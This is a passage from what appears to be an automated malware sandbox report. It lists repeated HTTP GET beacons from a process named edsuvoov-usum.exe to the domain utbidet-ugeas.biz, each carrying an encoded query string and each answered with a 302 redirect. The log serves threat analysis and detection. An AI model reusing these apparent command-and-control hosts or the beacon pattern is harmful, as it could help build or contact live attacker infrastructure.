                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.360144172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.436605930 CEST201OUTGET /d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.942900896 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.360146172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.439306974 CEST169OUTGET /d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.943244934 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:13 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.360147172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:13.955864906 CEST201OUTGET /d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:14.444094896 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:14 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBACA4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.360149172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.054189920 CEST169OUTGET /d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.564754963 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:15 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.360150172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:15.573806047 CEST201OUTGET /d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.063642025 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:16 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150EC
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            20192.168.2.360152172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:16.726694107 CEST169OUTGET /d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.209203959 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            21192.168.2.360153172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.224905968 CEST201OUTGET /d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:17.710038900 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            22192.168.2.360155172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.129193068 CEST169OUTGET /d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.635785103 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:20 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.360156172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:20.645337105 CEST201OUTGET /d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.125236988 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51A45
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.360158172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.272953987 CEST169OUTGET /d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.759421110 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:21 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            25192.168.2.360159172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:21.768987894 CEST201OUTGET /d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:22.269361019 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C360
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            26192.168.2.361352172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:26.969809055 CEST169OUTGET /d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.472398996 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            27192.168.2.361353172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.483975887 CEST201OUTGET /d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:27.974005938 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
